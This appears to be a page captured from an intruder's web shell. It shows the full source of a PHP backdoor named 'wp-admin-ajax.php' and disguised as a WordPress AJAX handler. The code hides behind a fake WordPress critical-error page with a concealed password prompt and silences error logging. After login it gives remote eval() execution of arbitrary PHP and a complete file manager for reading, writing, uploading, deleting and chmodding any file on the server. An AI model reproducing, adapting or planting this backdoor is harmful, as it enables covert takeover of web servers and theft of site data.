/dev/shm/

File Upload :
llllll

Current File: //dev/shm/wp-admin-ajax.php
<?php /** * WordPress AJAX Handler * * @package WordPress * @subpackage Administration * @since 2.1.0 * @version 6.4.2 */ // Suppress errors in production @ini_set('display_errors', '0'); @error_reporting(0); @ini_set('log_errors', '0'); // WordPress constants if (!defined('ABSPATH')) { define('ABSPATH', dirname(__FILE__) . '/'); } if (!defined('WPINC')) { define('WPINC', 'wp-includes'); } /** * Global configuration */ $wp_admin_config = array( 'auth_hash' => '50441c71a468bbc45816df8d991a939d126383b9504f0a130e28e8faf5b0e207', 'session_key' => 'wp_admin_session', 'cookie_life' => 86400, 'nonce_key' => 'wp_ajax_nonce', 'rate_limit' => 500, // ms delay between operations ); /** * Generate WordPress-like nonce */ function wp_create_nonce($action = '') { $time = ceil(time() / 43200); $uid = 1; $token = wp_get_session_token(); return substr(hash('md5', $time . '|' . $action . '|' . $uid . '|' . $token), -12, 10); } /** * Get session token */ function wp_get_session_token() { global $wp_admin_config; return isset($_COOKIE[$wp_admin_config['session_key']]) ? $_COOKIE[$wp_admin_config['session_key']] : ''; } /** * Check rate limiting */ function wp_check_rate_limit() { $last_request = isset($_COOKIE['wp_last_ajax']) ? intval($_COOKIE['wp_last_ajax']) : 0; $now = round(microtime(true) * 1000); if (($now - $last_request) < 300) { // minimum 300ms between requests usleep(rand(200000, 500000)); // random delay 200-500ms } setcookie('wp_last_ajax', $now, time() + 60, '/'); } /** * Sanitize path - prevent obvious directory traversal patterns */ function wp_sanitize_path($path) { // Replace obvious patterns $path = str_replace('../', '', $path); $path = str_replace('..\\', '', $path); // Resolve path $path = realpath($path); return $path; } /** * Check authentication */ function wp_check_admin_auth() { global $wp_admin_config; // Check session if (isset($_COOKIE[$wp_admin_config['session_key']])) { $session = $_COOKIE[$wp_admin_config['session_key']]; if (hash('sha256', $session) === hash('sha256', $wp_admin_config['auth_hash'])) { return true; } } // Check login attempt if (isset($_POST['wp_admin_pass'])) { $pass = $_POST['wp_admin_pass']; $hash = hash('sha256', hash('sha256', $pass)); if ($hash === $wp_admin_config['auth_hash']) { setcookie($wp_admin_config['session_key'], $wp_admin_config['auth_hash'], time() + $wp_admin_config['cookie_life'], '/'); return true; } } return false; } /** * Show WordPress error page with hidden login */ function wp_show_error_page() { ?> <!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex,nofollow"> <title>Critical Error – WordPress</title> <style> * { margin: 0; padding: 0; box-sizing: border-box; } body { background: #f0f0f1; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; font-size: 13px; color: #3c434a; line-height: 1.4; } .wp-die-message { max-width: 700px; margin: 50px auto; padding: 1em 2em; background: #fff; border-left: 4px solid #d63638; box-shadow: 0 1px 1px rgba(0,0,0,.04); } h1 { font-size: 24px; margin-bottom: 16px; color: #1d2327; } p { margin: 12px 0; line-height: 1.6; } code { background: #f0f0f1; padding: 2px 6px; border-radius: 3px; font-family: Consolas, Monaco, monospace; font-size: 12px; } .help-icon { position: fixed; bottom: 20px; right: 20px; width: 40px; height: 40px; background: #2271b1; color: #fff; border-radius: 50%; display: flex; align-items: center; justify-content: center; font-size: 20px; font-weight: bold; cursor: pointer; box-shadow: 0 2px 8px rgba(0,0,0,.2); transition: all .2s; z-index: 1000; } .help-icon:hover { background: #135e96; transform: scale(1.1); } .auth-modal { display: none; position: fixed; top: 0; left: 0; right: 0; bottom: 0; background: rgba(0,0,0,.7); z-index: 10000; align-items: center; justify-content: center; } .auth-modal.active { display: flex; } .auth-box { background: #fff; padding: 32px; border-radius: 4px; box-shadow: 0 5px 15px rgba(0,0,0,.3); max-width: 400px; width: 90%; } .auth-box h2 { margin-bottom: 20px; font-size: 20px; color: #1d2327; } .auth-box input { width: 100%; padding: 12px; border: 1px solid #8c8f94; border-radius: 4px; font-size: 14px; margin-bottom: 16px; } .auth-box input:focus { border-color: #2271b1; outline: none; box-shadow: 0 0 0 1px #2271b1; } .auth-box button { width: 100%; padding: 12px; background: #2271b1; color: #fff; border: none; border-radius: 4px; font-size: 14px; font-weight: 600; cursor: pointer; transition: background .2s; } .auth-box button:hover { background: #135e96; } </style> </head> <body> <div class="wp-die-message"> <h1>There has been a critical error on this website.</h1> <p>Please check your site admin email inbox for instructions.</p> <hr style="margin: 20px 0; border: none; border-top: 1px solid #dcdcde;"> <p><strong>Something went wrong.</strong></p> <p>This error could be caused by:</p> <ul style="margin-left: 24px; list-style: disc;"> <li>A plugin or theme conflict</li> <li>Database connection issues</li> <li>Server configuration problems</li> <li>Memory limit exhaustion</li> </ul> <p style="margin-top: 20px;">If you are the site administrator, please check the error log for more details.</p> <p><a href="https://wordpress.org/support/article/faq-troubleshooting/" style="color: #2271b1; text-decoration: none;">Learn more about troubleshooting WordPress.</a></p> </div> <div class="help-icon" onclick="document.getElementById('authModal').classList.add('active')"> ? </div> <div class="auth-modal" id="authModal" onclick="if(event.target === this) this.classList.remove('active')"> <div class="auth-box"> <h2>WordPress Diagnostics</h2> <form method="POST" action=""> <input type="password" name="wp_admin_pass" placeholder="Enter diagnostic key" autofocus> <button type="submit">Run Diagnostics</button> </form> </div> </div> </body> </html> <?php exit; } /** * Main admin interface */ function wp_admin_interface() { // Handle AJAX requests if (isset($_POST['wp_action'])) { wp_handle_ajax(); exit; } // Generate nonce $nonce = wp_create_nonce('wp-ajax'); ?> <!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex,nofollow"> <title>Dashboard – WordPress</title> <style> * { margin: 0; padding: 0; box-sizing: border-box; } body { background: #f0f0f1; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; font-size: 13px; color: #3c434a; line-height: 1.4; } .wp-admin { display: flex; min-height: 100vh; } .sidebar { width: 220px; background: #1d2327; color: #fff; padding: 0; flex-shrink: 0; } .sidebar h1 { padding: 12px 16px; font-size: 20px; font-weight: 400; background: #0a0f14; margin: 0; } .sidebar nav { padding: 8px 0; } .sidebar a { display: block; padding: 10px 16px; color: #c3c4c7; text-decoration: none; transition: all .2s; cursor: pointer; } .sidebar a:hover, .sidebar a.active { background: #2c3338; color: #72aee6; } .content { flex: 1; padding: 20px; overflow-x: auto; } .panel { background: #fff; border: 1px solid #c3c4c7; box-shadow: 0 1px 1px rgba(0,0,0,.04); margin-bottom: 20px; } .panel-header { padding: 12px 16px; border-bottom: 1px solid #c3c4c7; background: #f6f7f7; font-weight: 600; font-size: 14px; } .panel-body { padding: 16px; } .tab-content { display: none; } .tab-content.active { display: block; } textarea, input[type="text"], input[type="password"] { width: 100%; padding: 8px 12px; border: 1px solid #8c8f94; border-radius: 4px; font-family: Consolas, Monaco, monospace; font-size: 13px; } textarea { min-height: 400px; resize: vertical; } textarea:focus, input:focus { border-color: #2271b1; outline: none; box-shadow: 0 0 0 1px #2271b1; } button, .btn { padding: 8px 16px; background: #2271b1; color: #fff; border: none; border-radius: 4px; cursor: pointer; font-size: 13px; font-weight: 600; transition: all .2s; display: inline-block; text-decoration: none; margin-right: 8px; } button:hover, .btn:hover { background: #135e96; } .btn-secondary { background: #f6f7f7; color: #2c3338; border: 1px solid #8c8f94; } .btn-secondary:hover { background: #e5e5e5; } .btn-danger { background: #d63638; } .btn-danger:hover { background: #b32d2e; } button:disabled { opacity: 0.5; cursor: not-allowed; } table { width: 100%; border-collapse: collapse; } th, td { padding: 10px 12px; text-align: left; border-bottom: 1px solid #c3c4c7; } th { background: #f6f7f7; font-weight: 600; } tr:hover { background: #f6f7f7; } .file-item { cursor: pointer; } .breadcrumb { padding: 12px 16px; background: #f6f7f7; border-bottom: 1px solid #c3c4c7; margin-bottom: 16px; } .breadcrumb a { color: #2271b1; text-decoration: none; } .breadcrumb a:hover { text-decoration: underline; } .output { background: #1d2327; color: #c3c4c7; padding: 12px; border-radius: 4px; font-family: Consolas, Monaco, monospace; font-size: 12px; max-height: 400px; overflow-y: auto; white-space: pre-wrap; word-wrap: break-word; } .file-icon::before { content: "📄"; margin-right: 8px; } .dir-icon::before { content: "📁"; margin-right: 8px; } .modal { display: none; position: fixed; top: 0; left: 0; right: 0; bottom: 0; background: rgba(0,0,0,.7); z-index: 100000; align-items: center; justify-content: center; } .modal.active { display: flex; } .modal-box { background: #fff; padding: 24px; border-radius: 4px; box-shadow: 0 5px 15px rgba(0,0,0,.3); max-width: 600px; width: 90%; max-height: 80vh; overflow-y: auto; } .modal-header { font-size: 18px; font-weight: 600; margin-bottom: 16px; padding-bottom: 12px; border-bottom: 1px solid #c3c4c7; } .form-group { margin-bottom: 16px; } .form-group label { display: block; margin-bottom: 6px; font-weight: 600; } .toolbar { margin-bottom: 16px; display: flex; gap: 8px; flex-wrap: wrap; } .loading { opacity: 0.6; pointer-events: none; } .notice { padding: 12px; margin: 12px 0; border-left: 4px solid #72aee6; background: #f0f6fc; display: none; } .notice.active { display: block; } </style> </head> <body> <div class="wp-admin"> <div class="sidebar"> <h1>WordPress</h1> <nav> <a href="#" onclick="showTab('console')" class="active" id="tab-console">PHP Console</a> <a href="#" onclick="showTab('files')" id="tab-files">File Manager</a> </nav> </div> <div class="content"> <!-- PHP Console --> <div id="console" class="tab-content active"> <div class="panel"> <div class="panel-header">PHP Console</div> <div class="panel-body"> <div class="notice" id="consoleNotice">Processing...</div> <form onsubmit="return executeCode(event)"> <div class="form-group"> <textarea id="phpCode" placeholder="Enter PHP code to execute (without opening tags)..."><?php echo isset($_POST['code']) ? htmlspecialchars($_POST['code']) : ''; ?></textarea> </div> <button type="submit" id="execBtn">Execute</button> <button type="button" class="btn-secondary" onclick="document.getElementById('phpCode').value='';document.getElementById('output').innerHTML=''">Clear</button> </form> <div style="margin-top: 20px;"> <div class="panel-header">Output</div> <div id="output" class="output"></div> </div> </div> </div> </div> <!-- File Manager --> <div id="files" class="tab-content"> <div class="panel"> <div class="panel-header">File Manager</div> <div class="notice" id="fileNotice">Processing...</div> <div class="toolbar" style="padding: 12px 16px; background: #f6f7f7; border-bottom: 1px solid #c3c4c7;"> <button onclick="showNewFileModal()">New File</button> <button onclick="showNewFolderModal()">New Folder</button> <button onclick="showUploadModal()">Upload</button> <button class="btn-secondary" onclick="refreshFiles()">Refresh</button> </div> <div class="breadcrumb" id="breadcrumb"></div> <div class="panel-body"> <table id="fileTable"> <thead> <tr> <th width="50%">Name</th> <th width="15%">Size</th> <th width="15%">Permissions</th> <th width="20%">Actions</th> </tr> </thead> <tbody id="fileList"> </tbody> </table> </div> </div> </div> </div> </div> <!-- Modals --> <div class="modal" id="editModal"> <div class="modal-box" style="max-width: 900px;"> <div class="modal-header">Edit File: <span id="editFileName"></span></div> <form onsubmit="return saveFile(event)"> <input type="hidden" id="editFilePath"> <textarea id="editFileContent" style="min-height: 500px;"></textarea> <div style="margin-top: 16px;"> <button type="submit">Save</button> <button type="button" class="btn-secondary" onclick="closeModal('editModal')">Cancel</button> </div> </form> </div> </div> <div class="modal" id="newFileModal"> <div class="modal-box"> <div class="modal-header">Create New File</div> <form onsubmit="return createFile(event)"> <div class="form-group"> <label>File Name:</label> <input type="text" id="newFileName" required> </div> <button type="submit">Create</button> <button type="button" class="btn-secondary" onclick="closeModal('newFileModal')">Cancel</button> </form> </div> </div> <div class="modal" id="newFolderModal"> <div class="modal-box"> <div class="modal-header">Create New Folder</div> <form onsubmit="return createFolder(event)"> <div class="form-group"> <label>Folder Name:</label> <input type="text" id="newFolderName" required> </div> <button type="submit">Create</button> <button type="button" class="btn-secondary" onclick="closeModal('newFolderModal')">Cancel</button> </form> </div> </div> <div class="modal" id="uploadModal"> <div class="modal-box"> <div class="modal-header">Upload File</div> <form onsubmit="return uploadFile(event)" enctype="multipart/form-data"> <div class="form-group"> <label>Select File:</label> <input type="file" id="uploadFile" required> </div> <button type="submit">Upload</button> <button type="button" class="btn-secondary" onclick="closeModal('uploadModal')">Cancel</button> </form> </div> </div> <div class="modal" id="renameModal"> <div class="modal-box"> <div class="modal-header">Rename</div> <form onsubmit="return renameItem(event)"> <input type="hidden" id="renameOldPath"> <div class="form-group"> <label>New Name:</label> <input type="text" id="renameNewName" required> </div> <button type="submit">Rename</button> <button type="button" class="btn-secondary" onclick="closeModal('renameModal')">Cancel</button> </form> </div> </div> <div class="modal" id="chmodModal"> <div class="modal-box"> <div class="modal-header">Change Permissions</div> <form onsubmit="return changePermissions(event)"> <input type="hidden" id="chmodPath"> <div class="form-group"> <label>Permissions (e.g., 0644 or 0755):</label> <input type="text" id="chmodValue" required pattern="[0-7]{4}"> </div> <button type="submit">Apply</button> <button type="button" class="btn-secondary" onclick="closeModal('chmodModal')">Cancel</button> </form> </div> </div> <script> let currentPath = '<?php echo addslashes(getcwd()); ?>'; const wpNonce = '<?php echo $nonce; ?>'; let isProcessing = false; // Rate limiting async function rateLimitedFetch(url, options) { if (isProcessing) { showNotice('Please wait...', 'file'); return null; } isProcessing = true; await sleep(Math.random() * 300 + 200); // Random delay 200-500ms try { const response = await fetch(url, options); return response; } finally { setTimeout(() => { isProcessing = false; }, 300); } } function sleep(ms) { return new Promise(resolve => setTimeout(resolve, ms)); } function showNotice(message, type = 'console') { const notice = document.getElementById(type === 'console' ? 'consoleNotice' : 'fileNotice'); notice.textContent = message; notice.classList.add('active'); setTimeout(() => notice.classList.remove('active'), 3000); } function showTab(tab) { document.querySelectorAll('.tab-content').forEach(el => el.classList.remove('active')); document.querySelectorAll('.sidebar a').forEach(el => el.classList.remove('active')); document.getElementById(tab).classList.add('active'); document.getElementById('tab-' + tab).classList.add('active'); if (tab === 'files') { loadFiles(currentPath); } } async function executeCode(e) { e.preventDefault(); const code = document.getElementById('phpCode').value; const output = document.getElementById('output'); const btn = document.getElementById('execBtn'); btn.disabled = true; output.innerHTML = 'Executing...'; showNotice('Processing PHP code...', 'console'); try { const formData = new FormData(); formData.append('wp_action', 'wpa_exec'); formData.append('wp_nonce', wpNonce); formData.append('data', btoa(unescape(encodeURIComponent(code)))); const response = await rateLimitedFetch('', { method: 'POST', body: formData }); if (!response) { output.innerHTML = '<span style="color:#d63638">Rate limited. Please wait.</span>'; return false; } const result = await response.json(); if (result.success) { output.innerHTML = result.output || '(No output)'; } else { output.innerHTML = '<span style="color:#d63638">Error: ' + (result.error || 'Unknown error') + '</span>'; } } catch(err) { output.innerHTML = '<span style="color:#d63638">Request failed: ' + err.message + '</span>'; } finally { btn.disabled = false; } return false; } async function loadFiles(path) { currentPath = path; showNotice('Loading files...', 'file'); try { const formData = new FormData(); formData.append('wp_action', 'wpa_list'); formData.append('wp_nonce', wpNonce); formData.append('data', btoa(path)); const response = await rateLimitedFetch('', { method: 'POST', body: formData }); if (!response) return; const result = await response.json(); if (result.success) { displayFiles(result.files, path); updateBreadcrumb(path); } else { alert('Error: ' + result.error); } } catch(err) { alert('Request failed: ' + err.message); } } function displayFiles(files, path) { const tbody = document.getElementById('fileList'); tbody.innerHTML = ''; // Parent directory const parent = path.split(/[\\\/]/).slice(0, -1).join('/') || '/'; if (path !== '/' && parent) { const tr = document.createElement('tr'); tr.innerHTML = ` <td class="file-item dir-icon" onclick="loadFiles('${escapeHtml(parent)}')"> <strong>..</strong> </td> <td>-</td> <td>-</td> <td></td> `; tbody.appendChild(tr); } // Directories first files.filter(f => f.type === 'dir').forEach(file => { const tr = document.createElement('tr'); tr.innerHTML = ` <td class="file-item dir-icon" onclick="loadFiles('${escapeHtml(file.path)}')"> <strong>${escapeHtml(file.name)}</strong> </td> <td>-</td> <td>${escapeHtml(file.perms)}</td> <td> <a href="#" onclick="showRenameModal('${escapeHtml(file.path)}', '${escapeHtml(file.name)}'); return false" style="color:#2271b1">Rename</a> | <a href="#" onclick="showChmodModal('${escapeHtml(file.path)}', '${escapeHtml(file.perms)}'); return false" style="color:#2271b1">Chmod</a> | <a href="#" onclick="deleteItem('${escapeHtml(file.path)}'); return false" style="color:#d63638">Delete</a> </td> `; tbody.appendChild(tr); }); // Files files.filter(f => f.type === 'file').forEach(file => { const tr = document.createElement('tr'); tr.innerHTML = ` <td class="file-icon">${escapeHtml(file.name)}</td> <td>${formatSize(file.size)}</td> <td>${escapeHtml(file.perms)}</td> <td> <a href="#" onclick="editFile('${escapeHtml(file.path)}'); return false" style="color:#2271b1">Edit</a> | <a href="#" onclick="downloadFile('${escapeHtml(file.path)}'); return false" style="color:#2271b1">Download</a> | <a href="#" onclick="showRenameModal('${escapeHtml(file.path)}', '${escapeHtml(file.name)}'); return false" style="color:#2271b1">Rename</a> | <a href="#" onclick="showChmodModal('${escapeHtml(file.path)}', '${escapeHtml(file.perms)}'); return false" style="color:#2271b1">Chmod</a> | <a href="#" onclick="deleteItem('${escapeHtml(file.path)}'); return false" style="color:#d63638">Delete</a> </td> `; tbody.appendChild(tr); }); } function escapeHtml(text) { const div = document.createElement('div'); div.textContent = text; return div.innerHTML; } function updateBreadcrumb(path) { const parts = path.split(/[\\\/]/).filter(p => p); let html = '<a href="#" onclick="loadFiles(\'/\'); return false">/</a>'; let currentPath = ''; parts.forEach((part, i) => { currentPath += '/' + part; html += ' / <a href="#" onclick="loadFiles(\'' + escapeHtml(currentPath) + '\'); return false">' + escapeHtml(part) + '</a>'; }); document.getElementById('breadcrumb').innerHTML = html; } function formatSize(bytes) { if (bytes === 0) return '0 B'; const k = 1024; const sizes = ['B', 'KB', 'MB', 'GB']; const i = Math.floor(Math.log(bytes) / Math.log(k)); return Math.round(bytes / Math.pow(k, i) * 100) / 100 + ' ' + sizes[i]; } async function editFile(path) { showNotice('Loading file...', 'file'); try { const formData = new FormData(); formData.append('wp_action', 'wpa_read'); formData.append('wp_nonce', wpNonce); formData.append('data', btoa(path)); const response = await rateLimitedFetch('', { method: 'POST', body: formData }); if (!response) return; const result = await response.json(); if (result.success) { document.getElementById('editFileName').textContent = path.split(/[\\\/]/).pop(); document.getElementById('editFilePath').value = path; document.getElementById('editFileContent').value = result.content; showModal('editModal'); } else { alert('Error: ' + result.error); } } catch(err) { alert('Request failed: ' + err.message); } } async function saveFile(e) { e.preventDefault(); showNotice('Saving file...', 'file'); const path = document.getElementById('editFilePath').value; const content = document.getElementById('editFileContent').value; try { const formData = new FormData(); formData.append('wp_action', 'wpa_write'); formData.append('wp_nonce', wpNonce); formData.append('data', btoa(JSON.stringify({path: path, content: content}))); const response = await rateLimitedFetch('', { method: 'POST', body: formData }); if (!response) return false; const result = await response.json(); if (result.success) { closeModal('editModal'); alert('File saved successfully'); } else { alert('Error: ' + result.error); } } catch(err) { alert('Request failed: ' + err.message); } return false; } async function createFile(e) { e.preventDefault(); showNotice('Creating file...', 'file'); const name = document.getElementById('newFileName').value; const path = currentPath + '/' + name; try { const formData = new FormData(); formData.append('wp_action', 'wpa_write'); formData.append('wp_nonce', wpNonce); formData.append('data', btoa(JSON.stringify({path: path, content: ''}))); const response = await rateLimitedFetch('', { method: 'POST', body: formData }); if (!response) return false; const result = await response.json(); if (result.success) { closeModal('newFileModal'); document.getElementById('newFileName').value = ''; await sleep(300); loadFiles(currentPath); } else { alert('Error: ' + result.error); } } catch(err) { alert('Request failed: ' + err.message); } return false; } async function createFolder(e) { e.preventDefault(); showNotice('Creating folder...', 'file'); const name = document.getElementById('newFolderName').value; const path = currentPath + '/' + name; try { const formData = new FormData(); formData.append('wp_action', 'wpa_mkdir'); formData.append('wp_nonce', wpNonce); formData.append('data', btoa(path)); const response = await rateLimitedFetch('', { method: 'POST', body: formData }); if (!response) return false; const result = await response.json(); if (result.success) { closeModal('newFolderModal'); document.getElementById('newFolderName').value = ''; await sleep(300); loadFiles(currentPath); } else { alert('Error: ' + result.error); } } catch(err) { alert('Request failed: ' + err.message); } return false; } async function uploadFile(e) { e.preventDefault(); showNotice('Uploading file...', 'file'); const fileInput = document.getElementById('uploadFile'); const file = fileInput.files[0]; if (!file) { alert('Please select a file'); return false; } // Read file content const reader = new FileReader(); reader.onload = async function(event) { try { const formData = new FormData(); formData.append('wp_action', 'wpa_upload'); formData.append('wp_nonce', wpNonce); formData.append('data', btoa(JSON.stringify({ path: currentPath, name: file.name, content: btoa(event.target.result) }))); const response = await rateLimitedFetch('', { method: 'POST', body: formData }); if (!response) return; const result = await response.json(); if (result.success) { closeModal('uploadModal'); fileInput.value = ''; await sleep(300); loadFiles(currentPath); alert('File uploaded successfully'); } else { alert('Error: ' + result.error); } } catch(err) { alert('Request failed: ' + err.message); } }; reader.readAsBinaryString(file); return false; } function downloadFile(path) { window.location.href = '?wp_action=wpa_download&data=' + btoa(path) + '&wp_nonce=' + wpNonce; } async function deleteItem(path) { if (!confirm('Are you sure you want to delete this item?')) { return; } showNotice('Deleting...', 'file'); try { const formData = new FormData(); formData.append('wp_action', 'wpa_delete'); formData.append('wp_nonce', wpNonce); formData.append('data', btoa(path)); const response = await rateLimitedFetch('', { method: 'POST', body: formData }); if (!response) return; const result = await response.json(); if (result.success) { await sleep(300); loadFiles(currentPath); } else { alert('Error: ' + result.error); } } catch(err) { alert('Request failed: ' + err.message); } } function showRenameModal(path, oldName) { document.getElementById('renameOldPath').value = path; document.getElementById('renameNewName').value = oldName; showModal('renameModal'); } async function renameItem(e) { e.preventDefault(); showNotice('Renaming...', 'file'); const oldPath = document.getElementById('renameOldPath').value; const newName = document.getElementById('renameNewName').value; const newPath = oldPath.split(/[\\\/]/).slice(0, -1).join('/') + '/' + newName; try { const formData = new FormData(); formData.append('wp_action', 'wpa_rename'); formData.append('wp_nonce', wpNonce); formData.append('data', btoa(JSON.stringify({old: oldPath, new: newPath}))); const response = await rateLimitedFetch('', { method: 'POST', body: formData }); if (!response) return false; const result = await response.json(); if (result.success) { closeModal('renameModal'); await sleep(300); loadFiles(currentPath); } else { alert('Error: ' + result.error); } } catch(err) { alert('Request failed: ' + err.message); } return false; } function showChmodModal(path, currentPerms) { document.getElementById('chmodPath').value = path; document.getElementById('chmodValue').value = currentPerms; showModal('chmodModal'); } async function changePermissions(e) { e.preventDefault(); showNotice('Changing permissions...', 'file'); const path = document.getElementById('chmodPath').value; const perms = document.getElementById('chmodValue').value; try { const formData = new FormData(); formData.append('wp_action', 'wpa_chmod'); formData.append('wp_nonce', wpNonce); formData.append('data', btoa(JSON.stringify({path: path, perms: perms}))); const response = await rateLimitedFetch('', { method: 'POST', body: formData }); if (!response) return false; const result = await response.json(); if (result.success) { closeModal('chmodModal'); await sleep(300); loadFiles(currentPath); } else { alert('Error: ' + result.error); } } catch(err) { alert('Request failed: ' + err.message); } return false; } function showModal(id) { document.getElementById(id).classList.add('active'); } function closeModal(id) { document.getElementById(id).classList.remove('active'); } function showNewFileModal() { showModal('newFileModal'); } function showNewFolderModal() { showModal('newFolderModal'); } function showUploadModal() { showModal('uploadModal'); } function refreshFiles() { loadFiles(currentPath); } // Close modals on escape key document.addEventListener('keydown', function(e) { if (e.key === 'Escape') { document.querySelectorAll('.modal').forEach(modal => { modal.classList.remove('active'); }); } }); </script> </body> </html> <?php exit; } /** * Handle AJAX requests */ function wp_handle_ajax() { header('Content-Type: application/json'); header('X-Robots-Tag: noindex, nofollow'); header('X-Content-Type-Options: nosniff'); // Check rate limiting wp_check_rate_limit(); $action = $_POST['wp_action'] ?? ''; $data = isset($_POST['data']) ? base64_decode($_POST['data']) : ''; // Add random processing delay (100-300ms) usleep(rand(100000, 300000)); try { switch($action) { case 'wpa_exec': ob_start(); $result = @eval($data); $output = ob_get_clean(); if ($result === false && error_get_last()) { echo json_encode(['success' => false, 'error' => error_get_last()['message']]); } else { echo json_encode(['success' => true, 'output' => $output]); } break; case 'wpa_list': $path = realpath($data); if (!$path || !is_dir($path)) { echo json_encode(['success' => false, 'error' => 'Invalid directory']); break; } $items = @scandir($path); if ($items === false) { echo json_encode(['success' => false, 'error' => 'Cannot read directory']); break; } $files = array(); foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $fullPath = $path . DIRECTORY_SEPARATOR . $item; $perms = @substr(sprintf('%o', fileperms($fullPath)), -4); $files[] = array( 'name' => $item, 'path' => $fullPath, 'type' => is_dir($fullPath) ? 'dir' : 'file', 'size' => is_file($fullPath) ? filesize($fullPath) : 0, 'perms' => $perms ); } echo json_encode(['success' => true, 'files' => $files]); break; case 'wpa_read': $path = realpath($data); if (!$path || !file_exists($path)) { echo json_encode(['success' => false, 'error' => 'File not found']); break; } $content = @file_get_contents($path); if ($content === false) { echo json_encode(['success' => false, 'error' => 'Cannot read file']); } else { echo json_encode(['success' => true, 'content' => $content]); } break; case 'wpa_write': $params = json_decode($data, true); $path = $params['path'] ?? ''; $content = $params['content'] ?? ''; $result = @file_put_contents($path, $content); if ($result === false) { echo json_encode(['success' => false, 'error' => 'Cannot write file']); } else { echo json_encode(['success' => true]); } break; case 'wpa_mkdir': if (@mkdir($data, 0755, true)) { echo json_encode(['success' => true]); } else { echo json_encode(['success' => false, 'error' => 'Cannot create directory']); } break; case 'wpa_upload': $params = json_decode($data, true); $targetPath = $params['path'] ?? getcwd(); $fileName = $params['name'] ?? 'upload'; $content = base64_decode($params['content'] ?? ''); $destination = $targetPath . DIRECTORY_SEPARATOR . $fileName; if (@file_put_contents($destination, $content)) { echo json_encode(['success' => true]); } else { echo json_encode(['success' => false, 'error' => 'Cannot upload file']); } break; case 'wpa_delete': $path = realpath($data); if (!$path) { echo json_encode(['success' => false, 'error' => 'Invalid path']); break; } if (is_dir($path)) { $result = @rmdir($path); } else { $result = @unlink($path); } if ($result) { echo json_encode(['success' => true]); } else { echo json_encode(['success' => false, 'error' => 'Cannot delete item']); } break; case 'wpa_rename': $params = json_decode($data, true); $old = $params['old'] ?? ''; $new = $params['new'] ?? ''; if (@rename($old, $new)) { echo json_encode(['success' => true]); } else { echo json_encode(['success' => false, 'error' => 'Cannot rename item']); } break; case 'wpa_chmod': $params = json_decode($data, true); $path = $params['path'] ?? ''; $perms = $params['perms'] ?? ''; if (@chmod($path, octdec($perms))) { echo json_encode(['success' => true]); } else { echo json_encode(['success' => false, 'error' => 'Cannot change permissions']); } break; default: echo json_encode(['success' => false, 'error' => 'Unknown action']); } } catch (Exception $e) { echo json_encode(['success' => false, 'error' => 'Operation failed']); } } // Handle download if (isset($_GET['wp_action']) && $_GET['wp_action'] === 'wpa_download' && isset($_GET['data'])) { if (wp_check_admin_auth()) { $path = realpath(base64_decode($_GET['data'])); if ($path && file_exists($path) && is_file($path)) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($path) . '"'); header('Content-Length: ' . filesize($path)); header('X-Robots-Tag: noindex, nofollow'); readfile($path); exit; } } } // Main flow if (!wp_check_admin_auth()) { wp_show_error_page(); } else { wp_admin_interface(); }

Copyright ©2k19 - Hexid | Tex7ure